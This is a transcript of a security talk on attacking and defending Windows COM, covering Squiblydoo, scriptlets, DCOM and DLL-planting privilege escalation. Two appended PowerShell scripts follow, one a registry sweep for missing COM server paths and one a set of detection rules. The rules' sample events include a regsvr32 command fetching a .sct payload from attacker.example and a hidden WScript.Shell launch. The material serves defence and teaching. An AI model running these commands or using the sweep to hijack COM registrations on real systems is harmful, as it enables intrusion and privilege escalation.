
Sure, no problem. Everybody, I'm 83, born today. I'll be talking about Windows COM, not windows.com, which I'm sure is a great website. We'll be talking about quite a few things, but first: I'm also on Twitter at Mandark, and on my website, and I'm trying to keep this kind of interactive, so feel free to ask questions. I'll also try to show some pictures and try to keep the glass down to a minimum, so we'll see how well that works out.

So we're going to talk about the background of COM, kind of why it's here and why it's here to stay, and also, like the title suggested, we're going to talk about this from a red team perspective as well as from a blue team perspective, so we get both sides rather than being red-focused, as you usually see in these kinds of talks. I want to give the blue teamers some tips and defenses as well that they can work into their platforms or their environments, and use that knowledge from both sides to help better the organization.

So, like I said, we'll start with C++. It's pretty heavy, but this structure here for this COM interface is pretty common; it's what you see. So, background: Microsoft at the time had some problems getting products to integrate in a way that wasn't really easy, giving developers some kind of flexibility to be more interoperable. And what we know today as programs being pretty portable, that wasn't really the case. So this technology has been around for a long time. There are great books, but unfortunately they're not visual. We associate things with Windows now with having a shell, so you see a command shell and PowerShell; there's no real COM shell. But as we'll see, it's kind of like things we're already familiar with, .NET and WMI, and I think it's pretty cool, it was pretty rad, we'll see why. With the technology being as old as the 90s, and the idea having been around for a long time, it's pretty well embedded, even in Windows 10 today.

With this being invented, you see the abstraction of COM interfaces from the Windows operating system; it's not really shown as "this is the COM way of doing it". You just see copying a file from one folder to a different folder; you generally don't see below the covers how it's working. Or even if you have embedded Word files in an Excel document, it's COM, abstracted away. So as we can see here, the picture on the left, we see a whole bunch of words that generally don't matter a whole lot right now. My mouse doesn't show up, but if you can see where it says ProgID count, this number is going to be pretty relevant, not right away, but keep in mind there are thousands of these objects here.

So with that, there are COM objects everywhere. Being portable is the first point; the first problem is how you get portable, and so it allows a way to package things together and make it dynamic, where they could be moved across machines. And with that, different kinds of models surfaced out of COM, with OLE and ActiveX. OLE, as I mentioned, was how you would transfer files, let's say putting Word into Excel, making that really seamless. As we can see, that's retro, yet even with CVEs associated with phishing, it's still being exploited today. And ActiveX, as we all know, makes IE make bad life choices, so that's thankfully been taken away for the most part; we don't really see ActiveX used quite as often, perhaps only in ICS-type environments. But all of that was really built on the idea of COM, different extensions of COM building on top of it.

So COM has been talked about a lot so far, but how do we see this? Well, you might be familiar with COM being used in scripts you might have downloaded, like this. A script, for example, uses the Scripting.FileSystemObject COM object, and so you may have been familiar with that, or probably more recently with the WScript.Shell COM object. These are all different COM objects, and that's how we're using them, bubbling it up. Also, if I can say COM a hundred times I get a prize, so I'm trying to bump up that word count. So, you know, from here you see a lot of VBScript; it's pretty gnarly, it's not as pretty as PowerShell. PowerShell thankfully makes everything a lot simpler. Where with that VBScript we had to do a lot of different manipulation, with PowerShell it makes it really easy to just do $com = New-Object -ComObject WScript.Shell, and so we have a very simple way to consume COM interfaces with a custom PowerShell object. And if we just print out that COM object itself, $com, and pipe it to Get-Member, we can see all the methods associated with this COM interface. So that makes it easy for administrators and bad guys to quickly consume COM objects.

So, before we get too far down that rabbit hole, taking a quick break from our sponsors: COM really is a hot mess, because, you know, it's been around for a long
time. They had to put it somewhere; they had to put all this configuration information somewhere where people like developers and administrators could quickly get that information and use it, and get it in a reliable and safe way. So naturally the only place to put this is in the registry, which, as we know, is a good place, a goldmine of information. And so Windows made this special class... a lot of folks did not want to go into this, HKEY_CLASSES_ROOT, and so this combines both the HKLM (local machine) and the HKCU (current user) hives into one super hive. Now it's twice as powerful. This becomes important later on, because as a user I can control quite a few things, and normally when things are down in the HKLM hive that's usually locked down, but if we have some place that a user can influence, like in Classes Root, that can cause quite a few problems. And COM objects don't have to live in the registry; they can also live as manifest files and COM scriptlets, which we'll see later on.

So to break down COM itself, we need to understand how different parts of COM are referenced and how we can use that. Back to the prior example, we have the COM object WScript.Shell; that interface is referred to by the ProgID, and so that makes a simple way to reference a COM object. But additionally, you don't have to use that easier way; you can refer to it the GUID-type way with the interface ID, and so both of these are unique identifiers within the registry. Another way to be referenced, for any kind of opportunities, as I mentioned, is COM scriptlets; those are the .sct files. People throw around "COM scriptlet", "COM scriptlet", but you know, we might have heard of Windows COM and COM+, and how would you really know what it is, looking at it like this article here from zerosum0x0 or this tweet: how do I know that it's a COM scriptlet or COM+? Is it kind of like C and C++, where it's similar-ish but not really? You won't really be able to compile; I also use GCC for C++ and C and hope it works out well. So thankfully, Microsoft to the rescue: docs are available on both COM and COM+. From what I've seen it doesn't really matter, from what I can tell; I'm sure there may be some differences, but from what I've seen there's not really much of a distinction between when you would call it COM or COM+. But like PowerShell scripts or VBScripts, these kinds of scripts are ways for us to do some pretty fun things with scriptlets.

And I haven't really seen this attack, but here's a little fun opportunity: we can create COM objects from a Java class. Class files, if you were looking through DLP or having your AV flag them, they might look for a .sct file, but how many times do developers have .class files on machines? How are you going to know that's a malicious intent for COM, or a developer's file for some kind of Java project? And thankfully nobody has the JRE installed anywhere in the enterprise, I'm sure, and it's not 1.7 or 1.8, so that should work out pretty well for us.

So one of the people to really evangelize the use of COM scriptlets, you probably know him as subTee, or Casey Smith, really helped evangelize the idea of abusing COM to cause problems. And this is all it really is for an .sct file: it's an XML-based file, and we can see just from this one line that we're going to create an ActiveX COM object with WScript.Shell, the shell object on the Windows machine, and call calc.exe. As we all know, calc is very nefarious and should never be run. So, just to quickly show this in action, I'll check if it's on my screen, not sure what's on yours... what's the bad choice? Yes, so we see that file, we see that scriptlet object being called; it's going to be run here and very soon we should see... oh, good. We're using the Squiblydoo method here to call regsvr32 to register that .sct file, and that runs our file using the Squiblydoo method. We've probably not seen it too much more often now, but it's definitely still a vector that needs to be thought of while we're having our EDR solutions help us in our environments. And so, yeah, we saw calc.exe, that's whatever, but that could definitely be abused for any number of string objects, or a different, longer string calling all kinds of things to make a scheduled task, or delete log files, or any number of things.

So we had seen that built-in Windows command utility regsvr32 being used to help run that .sct file. That's a valid application on our machine, because it's used for any number of reasons, for registering objects or installing software; we would use that. But again, being abused by an attacker, we can see how an .sct file that looks harmless can simply do a lot of harm to our environment. And here I just broke down that Squiblydoo command that we saw on the command line, and we saw that it could run silently, we don't want to register it on the server, we want it unregistered so it's not persisted in the registry, and so if we try to uninstall it, it's going to run that object. So it's a really fun way to help remove as much disk activity, all those disk artifacts, as possible. And the fun thing is it doesn't have to be on our system; we can call it from an attacker system, and that scrobj.dll is what helps run those .sct files.

So Microsoft likes to iterate, likes anything better, easier; thus was born
COM+, to solve all of our problems. We can quickly, in a more structured way, manage COM in our environments, and try to help make this a surface so administrators can make enterprise-type solutions and configurations for our COM environment in the system, and so give us a way to better manage COM and really deal with it. Also, the fun thing is it has some really awesome icons. Now, if you've ever gone into the COM+ application administration thing, you see really cool things like a screw head, a box, a little map pointer thing, what we call now the dropper pin, but you know, it's for an interface, and it was really cool, so I really like that. I want to show this with you as well: if you go to Component Services on a Windows machine... and try again, if we chose a better way of doing this.

So Component Services is pretty standard on a Windows machine; it's a way to help see COM+ objects on our machine. If we look here, under COM+ Applications, we can see the default COM+ things we have there, and we can see easier ways to browse different ways to examine what's available on our system, the components there, that can help make us more locked down and more secure in environments that nobody goes into. And we forgot, and I forgot about this, but subtly cool icons. Oh, I just... all right.

So, you know, we do it once, we do it twice, why not a third time? So let's iterate again and we'll call it Distributed COM, DCOM. This helps us not only solve COM on our machine, but helps us wreck it all across the environment; why not do it all at once? So the Microsoft way helps you, with COM being much more easily accessible across the environment than before, so that's just really better for us as attackers. It's not really background, it's more like a red-team-focused background, and so like most Microsoft things, as soon as you know what you're doing, it's always dangerous. So, not only COM and COM+, but now we have DCOM ways of abusing this technology, kind of like with SMB or with SCM, a lot of opportunities. And so, as we can see here, Matt Nelson has a script; well, he has a script, but he kind of weaponized it in a PowerShell script to have this PowerShell script invoke a DCOM-based scriptlet that helps escalate privileges on the system. So that's cool.

So we always want to be able to look backwards in anger and integrate with legacy technologies, because it's too hard to just start fresh every single year with Microsoft. With that, .NET can reach back into COM and help attackers even more, and so from that perspective we call it the COM wrapper that helps manage the way we can interface with COM objects as attackers, or I mean administrators, and it may be easier for us. So this is C#, it's not C++, I'm sorry about that, but we can see here how we can still use .NET with COM, and vice versa: we can go from COM to .NET and help escalate those kinds of attack paths through COM, which is probably not as well managed or as well looked at from a .NET perspective with EDR solutions. So there are some opportunities there to really dive into that as an attacker; me, I just do this quickly, .NET object attack paths, and that still works. So, you know, we all have to try harder yet to really dig down more into this whole mess of .NET and COM. James Forshaw gave a pretty excellent talk last year at DerbyCon talking about the interoperability of .NET and COM; it's pretty well worth looking at, trying to see more of how this all works together, and yeah, it's pretty good.

So, back to C#, where we are really on the positive side. With most things in C#, you kind of have to take care of how you increment and how you use objects; in C# versus C++, we can see here pretty standard things: if we want to add a reference, if we want to, let's say, create a new object reference to a COM object, or if we want to see what options are available with this COM object, as far as, like, with WScript.Shell, what kinds of things would be available with that. And so, moving away from C and C++, that's gross, an easier way to look at this is, again, with AddRef and Release. And so, you know, we still have problems with use-after-free bugs that are still present today, that may be attributed to COM objects not having been properly released, and attackers taking advantage of those opportunities for UAF vulnerabilities. But, you know, if we're not able to fix open redirects, we should fix the low-hanging fruit first before we start digging into the harder things. As we can see here, we're still seeing use-after-free vulnerabilities, even back from 2004, with COM-based problems even today, so definitely something to take care of eventually, but maybe not.

So we see that even today COM isn't really that technology that's forgotten, or really a corner case. We're still seeing problems, with CVEs here from last month around COM that Microsoft still addresses, with problems and opportunities for bug bounties and attackers to take advantage of this kind of thing. We all look at the shiny new things, but we still have the rotting
underbelly of Windows still hanging around. Again, James Forshaw, I was like a fanboy, I guess I am. He does a great talk, usually based around COM and how that's being used, like with VirtualBox or anything that you would find in our environment. And so it's not really that the attacks are so magical or out of reach; they're actually very simple, like doing Squiblydoo or doing PowerShell scripts that help abuse these kinds of things, that we find or that are bundled into Cobalt Strike and other tools like that. But COM's been around for a very long time, so we go through a period of time where it's been talked about and, oh my gosh, a COM thing, it's like, oh, it's COM, oh my gosh, COM. And, you know, it's kind of like Adobe issues; we still see those. I mean, years ago, all the docs on Adobe, I know it's like nobody cares about Adobe, it'll be patched, it'll be patched. So attackers have been using COM in a variety of ways. With, uh, Firefox, with UAC, you know, we're using these COM interfaces to help escalate privileges, and they still work, so if it's not broke, why fix it, right, Microsoft?

So you saw, first off, still abusing COM, we can abuse things like VirtualBox to escalate privileges, or even with Casey Smith, as I showed earlier, with Squiblydoo with the scriptlet files, and then Matt Nelson, in his blog article last year about abusing Microsoft's MMC interface to reach out to a server and take privileges over it, because normally these things that run with COM operate at a higher level, with a SYSTEM or administrator account. So if we take advantage of COM that is already running as SYSTEM or administrator, here's a way of trying to compromise a user and then escalate up through there as well.

So, COM, but how can we see COM from an attacker's perspective? It's not really that hard to find COM-related issues, even on Windows 10 and server systems today. So one of the best ways to look for opportunities for exploitation is through Process Explorer; it's a free tool by Microsoft that helps you see a running snapshot. It's surprising how many times there are problems with the Windows system just chugging along. But if you look past what you'll see later on, you'll see in this tool medium-to-high-integrity attack paths that really open up: if you were to place, say, an attacker-based DLL in a location that Windows expects it to be, Windows will happily run that DLL that you supply in the path where it says NAME NOT FOUND, and it will no longer be not found, it'll be found, and it will run your DLL.

And so another opportunity to explore is with ReactOS. These people have gone through and tried to reverse engineer Windows as best as they can, so a lot of things that we would see in Windows are also reflected in ReactOS, and so sometimes COM typings will be in there; it just all depends on what you're looking for specifically. But unlike Windows, ReactOS is free, and it's also used for a lot of different research into Windows kernel vulnerabilities and other kinds of system-level attack paths that we would find in Windows as well. That's true; they try to be as mirrored as possible, but again, a fanboy as I am here for James Forshaw, I'll meet him one day, it's going to happen: his tool, OleViewDotNet. And so, you know, go look at those Component Services; we went through the registry, that's really gross; Process Explorer runs endlessly and finds a lot of things. If only there were a way we could quickly see COM goodies, like James Forshaw's tool. And so remember how I talked about WScript.Shell as a ProgID? Well, his tool showed 2592 potential paths for you to escalate privileges on a system. It doesn't really translate to a one-to-one ratio of abuse to interface, but how many times have you gone through a Windows system when you're doing system hardening or doing a review and thought, I wonder if all 3592 of these COM interfaces can possibly be exploited, like WScript.Shell can always easily run a shell on my system and run calc.exe? So I don't have time, but maybe you do, or you know something else does, that you can look and say, huh, I wonder if number 1184 can be used to load a DLL, or it could be used to make a system call, or it could be any number of things. And so really, just playing and with time, we can try to see if we find another attack path through this interface.

Another fun thing is James Forshaw's tool will also query all these COM interfaces at once, and it's a really bad idea, it'll probably cause some pain to your machine, but that's really fun, because what's happening is his tool will query all 3592-ish interfaces at once and try to see what happens. Normally you would never do that; you'd just do WScript.Shell, or some kind of, like, a file system info object to help work with the file system, never all at once. But a lot of fun things happen, so if you do query all interfaces at once, and you filter for NAME NOT FOUND with high integrity, running as a SYSTEM-level account, you could find a lot of fun things, like fondue.exe, I don't know, it puts a path for escalation. What you would use for things like this: Paul, at the same Lesley security, had his workshop last year for DEF CON that showed the different ways you can escalate privileges through this kind of very similar method, and it's on his GitHub. But basically you're going through the same process, where you're looking for things with Process Explorer to find privilege escalation issues that Microsoft won't fix. They say it's a design issue; it's also "as is"; these aren't what they consider to be part of their scope for security issues, but clearly escalating from a user to an administrator, to us, is a
security issue; to them, they see it as a design issue. So again, 2592, and that's just one system; I'm sure none of those are bad at all. And so, we'll see this summer at any of the big conferences, where they show the next big things; we know we saw last year with zerosum0x0's Koadic, the COM C2. So this is a purely COM-based command and control server platform, like Cobalt Strike but in COM. I mean, listening to his talk and seeing through his code, you can see there's a lot of pain associated with that, because we're not really used to having to deal with that pain; we see it abstracted many layers above with PowerShell or much more friendly ways to consume those COM interfaces. But at the time he demonstrated how this was a new attack, and using these kinds of methodologies, EDR products weren't really tuned to look for those kinds of things. And so, I'm sure, hopefully by now, it's been a while, these kinds of sensors could be developed to help detect these kinds of basic activities. So MITRE also has their ATT&CK framework that really breaks down, in a pretty good fashion, different attack paths and different kinds of scenarios that help you as an organization simulate attacker activity, so a lot of these things also take advantage of COM. So subTee is the fountain of knowledge that never stops, that helps give out new ways of COM attacks, as well as Matt Nelson and James Forshaw's bug tracker for Google, excuse me, which talks in depth about the different ways, what's wrong with the policies or what's wrong with Windows, and how this was abused, and so just mining that information for gold is pretty easy, just focusing on COM as an attack path, which is probably here to stay.

But, you know, it's one thing to have these tools available, but it's another thing to run them as well in our environment. So if we were to run things like Squiblydoo, or the Koadic COM stuff, or the reverse shells and Invoke-DCOM PowerShell scripts, can we detect that? If we're running these things in our environment in a structured way, are we expecting them to be detected, hopefully, or not? I think as red teamers and pen testers and security analysts we should also be using these tools; you know, we think, oh, COM, that's dumb, maybe it is, I like it, but if we're running that and it works, is it so dumb? Because it works. But are we catching these things with our products? And so maybe we're seeing that those tools run with privileges, maybe not, so hopefully that's what's helpful: that it bubbles up, and that we think it's probably a false positive. So I think really if we run these tools rigorously we can see whether our analysts and our blue team will try to catch these kinds of things, because attackers aren't going to help: hey, I'm an attacker, I'll be testing your environment here next week, I'll be running these tools, so check them out too.

So I talked a lot about red team, that's what I like more, but, you know, blue team's also cool; Justin wouldn't want me to say that as well. So, you know, blue team has a really hard job. Yeah, everybody says, oh, the attacker has to succeed once and we have to succeed, let's see, a hundred times. That's true, but we can do a lot of things as well as an organization to really push that along. I mean, by default Windows 10 is way more secure, just inherently, than Windows 7 or Windows 8, so if we're not really trying to push the ball along to get our environment up to Windows 10 and the latest version, and Windows Server 2016, and I'm sure 2017 and 20xx, I mean, that's just going to help by default stop a lot of things that we take for granted in our environments, things that have always been there. So these tools are always present and running so that we're locked down or better secured in our environments.

So with SpecterOps' Device Guard profiles, those really help us to lock down and prevent those kinds of attacks that could be easily stopped. So if we can get a lot of free help from Microsoft, "free" is all relative with licensing, if we get a lot of free help that way, with having these kinds of Device Guard profiles back up a lot of these things, it will stop a lot of different vectors and help us to really stop, for free, things we take for granted.

As well, I'm a huge proponent of PowerShell command-line auditing. This is a great thing, because for attackers, if it works simply in the environment, the other party might not catch it; you know, if I run PowerShell and I do things to bypass all kinds of things, and we're doing command-line auditing, and I'm looking for these kinds of different events on the command line, I can quickly alert and tell the blue team or analysts that there are bad things happening. So I a hundred percent endorse PowerShell command-line auditing and reviewing; reviewing is really the key word, for auditing, and nobody looks at it, that's one thing. But also, back down to the platform itself, the system itself, we should use at least version 5 whenever possible.
It just makes it harder for attackers to take advantage of the inherent weaknesses of earlier PowerShell versions, so if we're pushing them to higher versions of PowerShell across the environment, that's going to help us do a lot more things and be more aware of what's going on in our environment. But if we're doing the auditing and we look for -ComObject, how many times do you think users ever in their life open up PowerShell and then call a COM object? Probably never. So an attacker will probably be the person doing -ComObject WScript.Shell to make a point, or attack, or leverage some kind of attack, without doing any obfuscation from Daniel Bohannon or any of those other tools that are there to help mask that; they're trying to see if this is the easiest way possible, and if it works, why would they change? But if we're auditing that, we can quickly pick up on that.

And so also there are engines out there called wscript and cscript that can help run things like DotNetToJScript, James Forshaw's tool, DotNetToJScript. So these are JScript-type files that help us do very similar things, with usually COM-focused attacks, that help run these JavaScript-type scriptlets in our environment. But how many times do you think there is a serious need, and a constant need, to have these binaries even available on a system? You may think, oh, it's needed for this business process; it's probably... well, probably not. But intelligently test and remove these capabilities that attackers usually get for free on a system, like cscript. And also, shout out to F Pieces over there; he has done this in his environment and lived to tell the tale, whereas a madman, Barnett, was still running without these things in the environment. I'm not saying go ahead and delete them or block them, but just start exploring this kind of path where you take away attackers' easier tools and force them to use tools like PowerShell version 5 or other kinds of attacks that could be more easily detected and monitored.

And, you know, as Justin talked about today with Sysmon, a SIEM is great, but if you have more capability with Microsoft's focus on Sysmon, I mean, why not? There are a lot of great guides out there that help push this product along and help us get better visibility into our environment. So if possible, try out Sysmon; I can't think of a downside of trying that and seeing how well it works in the environment, and seeing if it's picking up gaps that we're not seeing as well. Another tool that just recently came out by Microsoft is called Project VAST. From my understanding it's very similar; it's still very much early, they're taking pilot clients now, but definitely more insight into attacker-type activities on the system, to help us bubble up and find attackers sooner and faster.

So COM, unfortunately, is here to stay. It's not like VBScript, where we axed that and got PowerShell. But if we force them to PowerShell and other ways that are more caught, that's going to be helpful for everybody. And so, you know, there are still larger parts of COM than we talked about today, things like the things we talked about with Matt Nelson, different attacks that he leverages, and things like markers of how different kinds of interpretations of COM are in the environment, and, as mentioned earlier, with the exploits, not really exploits, you're just taking advantage of bad design decisions that Microsoft won't fix for whatever reason, but that still work and give us what we want in the end. So who's winning in the end? If we can really help as a community by exploring new objects rather than that WScript.Shell and the FileSystemObject, and explore the other thousands of COM objects, perhaps it's even easier for us; I think as a whole, as a community, we could be even stronger and more secure. But, you know, not everybody takes the idea of COM seriously, like Adobe; I mean, we have Adobe ColdFusion making COM objects, sorry, bad apps on Windows, then we have ColdFusion COM objects, I'm sure it's secure and I'm sure it's fine. All right, so for more on COM, my blog there has some slides, so reach out to me through Twitter; there's a little Slack for folks, mostly based in Omaha, but feel free to join as well, we're looking for more members and to talk security. Are there any questions?
Question: You showed, I think pretty early on, that there's a way, if you could, to execute it via Java. Isn't a Java class just handing it off to a JVM that's already installed, or is that like an SCT?

Answer: Yeah, they're using a JRE to call that class object, that class. So, like, the JRE would be installed, but do you have a good reason to have it installed in the environment, right? So if you do, then it's adding that COM, well, SCT file; you have it on the disk, and then you use the JRE, which I'm sure some of us have installed, just, you know, fixing them together for another path forward. It's more like COM on Windows and C# going forward, but it's like this bubbling problem, kind of like what they're using right now, but just bringing it out to... I like that from MSDN, and we saw that, oh yeah, you can just call it from Java as well. I'm sure that's probably fun, but it's not really explored or talked about; I'm sure it is supported somewhere. Yeah, yeah, thanks. Yep.

Question: What useful functionality would you lose if you could disable COM on workstations throughout the enterprise?

Answer: Well, COM is kind of like the framework that powers everything, so you can't turn it off.

Question: Okay, how would you disable COM? I see that fancy COM+ folder with a couple of services.

Answer: Yeah, well, that's the COM+ server, but you could do, like, registration on top of the registered... the registration-free COM objects with the SCT file, they'll still run that interface whether it's in the registry or not. Or, yes, oh yeah, COM+, there are things that you lose, but you'd still run COM things. I don't know if I understand correctly; I haven't really explored that option, but it's definitely worth exploring and seeing if that was bad. Yeah, yeah. Anyone else? How many prizes? So let's talk about that. All right, next.
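The talk above mentions the ProgID count slide, the HKCR super hive that merges HKLM and HKCU, and the Process Explorer hunt for NAME NOT FOUND paths that a user can fill with their own DLL. The script below is an added example written for this page, not the speaker's code or any of the tools he names; it walks the registry side of that hunt: counts ProgIDs, lists every CLSID whose InprocServer32 or LocalServer32 target is missing on disk, and marks registrations that live in the user-writable HKCU\Software\Classes hive. It assumes Windows PowerShell 5.x and the standard HKCR\CLSID layout; the function names are mine.

```powershell
# Added example, not from the talk or from OleViewDotNet.
# Assumes Windows PowerShell 5.x and the standard HKCR\CLSID layout.

function Get-ComProgIdCount {
    # HKCR is the merged view of HKLM\Software\Classes and HKCU\Software\Classes.
    # A ProgID is a key directly under HKCR that carries a CLSID subkey.
    $count = 0
    foreach ($key in Get-ChildItem -Path 'Registry::HKEY_CLASSES_ROOT' -ErrorAction SilentlyContinue) {
        try { if ($key.GetSubKeyNames() -contains 'CLSID') { $count++ } } catch { }
    }
    return $count
}

function Resolve-ComServerPath {
    # Turn a raw InprocServer32/LocalServer32 value into a file path to test.
    param([Parameter(Mandatory)][string]$RawValue)
    $value = [Environment]::ExpandEnvironmentVariables($RawValue.Trim())
    if ($value.StartsWith('"')) {
        $end = $value.IndexOf('"', 1)
        if ($end -gt 0) { return $value.Substring(1, $end - 1) }
    }
    if (Test-Path -LiteralPath $value -PathType Leaf) { return $value }
    # Unquoted LocalServer32 values often carry switches such as /automation
    # or -Embedding; drop everything from the first " /" or " -" onwards.
    return ($value -split '\s+(?=[/-])', 2)[0]
}

function Get-ComServerReport {
    # One record per CLSID server registration. Exists=$false is the registry
    # equivalent of the NAME NOT FOUND lines seen in Process Explorer/Monitor:
    # CoCreateInstance will try to load that file if someone creates the object.
    # InUserHive=$true means the registration comes from HKCU, which the user owns.
    [CmdletBinding()]
    param([switch]$OnlyMissing)
    $clsidRoot = 'Registry::HKEY_CLASSES_ROOT\CLSID'
    foreach ($clsidKey in Get-ChildItem -Path $clsidRoot -ErrorAction SilentlyContinue) {
        $clsid = $clsidKey.PSChildName
        $subKeys = try { $clsidKey.GetSubKeyNames() } catch { @() }
        foreach ($serverType in 'InprocServer32', 'LocalServer32') {
            if ($subKeys -notcontains $serverType) { continue }
            $raw = try { $clsidKey.OpenSubKey($serverType).GetValue('') } catch { $null }
            if ([string]::IsNullOrWhiteSpace($raw)) { continue }
            $path   = Resolve-ComServerPath -RawValue $raw
            $exists = Test-Path -LiteralPath $path -PathType Leaf
            if ($OnlyMissing -and $exists) { continue }
            [pscustomobject]@{
                CLSID      = $clsid
                ServerType = $serverType
                Path       = $path
                Exists     = $exists
                InUserHive = Test-Path -LiteralPath "HKCU:\Software\Classes\CLSID\$clsid"
            }
        }
    }
}

"ProgID count: $(Get-ComProgIdCount)"
# Missing server binaries, user-hive registrations first: those are the ones a
# standard user can turn into a DLL/EXE planting opportunity or a hijack.
Get-ComServerReport -OnlyMissing | Sort-Object InUserHive -Descending | Format-Table -AutoSize
```

Two caveats a practitioner would want: a missing InprocServer32 target only becomes a privilege escalation if a higher-integrity process actually instantiates that CLSID and the missing directory is writable by you, so pair this list with the Process Explorer/Monitor observation the talk describes before calling anything a finding; and a clean report does not rule out the DLL search-order misses a loaded COM server makes for its own dependencies, which this registry sweep does not see.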
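The blue team half of the talk argues for command-line auditing and gives three things to look for: PowerShell calling -ComObject, regsvr32 running an .sct through scrobj.dll (Squiblydoo), and wscript/cscript executing JScript-style scriptlets such as DotNetToJScript output. The rules below are an added example written for this page, not the speaker's detections or any vendor's; they run over a handful of constructed events shaped like 4688/Sysmon process-creation data (Image plus CommandLine). The event records, the hostname attacker.example and the rule names are all invented for the example.

```powershell
# Added example, not from the talk. Events are constructed to look like
# Security 4688 / Sysmon EventID 1 data; attacker.example and all paths are made up.

$ComAbuseRules = @(
    @{ Name = 'PowerShell COM object'
       Image = 'powershell\.exe$|pwsh\.exe$'
       # PowerShell accepts any unambiguous parameter prefix, so -Com and -ComObj
       # both bind to -ComObject; exclude -Command and -ComputerName explicitly.
       Pattern = '-Com(?!mand|puter)\w*\b|GetTypeFromProgID|GetTypeFromCLSID' }
    @{ Name = 'Squiblydoo (regsvr32 + scrobj.dll)'
       Image = 'regsvr32\.exe$'
       # Normal registrations take a DLL path; scrobj.dll or /i: pointing at a
       # URL or .sct is the scriptlet-loading pattern the talk demonstrated.
       Pattern = 'scrobj\.dll|/i:\s*https?://|/i:\S*\.sct\b' }
    @{ Name = 'Script host running scriptlet'
       Image = '(wscript|cscript)\.exe$'
       Pattern = '\.(sct|js|jse|wsf)\b' }
)

function Test-ComAbuse {
    # Returns the names of every rule the (Image, CommandLine) pair matches.
    # -match is case-insensitive in PowerShell, which is what we want for Windows paths.
    param(
        [Parameter(Mandatory)][string]$Image,
        [Parameter(Mandatory)][AllowEmptyString()][string]$CommandLine
    )
    $hits = foreach ($rule in $ComAbuseRules) {
        if ($Image -match $rule.Image -and $CommandLine -match $rule.Pattern) { $rule.Name }
    }
    return @($hits)
}

function Find-ComAbuse {
    # Pipeline stage: emits one record per event that triggers at least one rule.
    param([Parameter(Mandatory, ValueFromPipeline)]$Event)
    process {
        $rules = Test-ComAbuse -Image $Event.Image -CommandLine $Event.CommandLine
        if ($rules.Count -gt 0) {
            [pscustomobject]@{ Id = $Event.Id; Image = $Event.Image; Rules = ($rules -join '; '); CommandLine = $Event.CommandLine }
        }
    }
}

# Constructed sample events: three should fire, two are ordinary admin activity and should not.
$SampleEvents = @(
    [pscustomobject]@{ Id = 1; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -nop -w hidden -c "$c = New-Object -ComObject WScript.Shell; $c.Run(''calc.exe'')"' }
    [pscustomobject]@{ Id = 2; Image = 'C:\Windows\System32\regsvr32.exe'
                       CommandLine = 'regsvr32 /s /n /u /i:http://attacker.example/payload.sct scrobj.dll' }
    [pscustomobject]@{ Id = 3; Image = 'C:\Windows\System32\cscript.exe'
                       CommandLine = 'cscript.exe //nologo C:\Users\jdoe\AppData\Local\Temp\update.js' }
    [pscustomobject]@{ Id = 4; Image = 'C:\Windows\System32\regsvr32.exe'
                       CommandLine = 'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"' }
    [pscustomobject]@{ Id = 5; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -Command "Invoke-Command -ComputerName srv01 -ScriptBlock { Get-Process }"' }
)

$SampleEvents | Find-ComAbuse | Format-Table -AutoSize   # expect Ids 1, 2 and 3
```

Feed the same function real 4688 events (after enabling "Include command line in process creation events") or Sysmon EventID 1 records and the rules carry over unchanged. The first rule is the one the talk leans on: ordinary users almost never type -ComObject, so even this crude match has a low false-positive rate, but it is trivially defeated by the obfuscation the speaker mentions, which is why the regsvr32 and script-host rules key on the binaries an attacker needs rather than on the text of the payload.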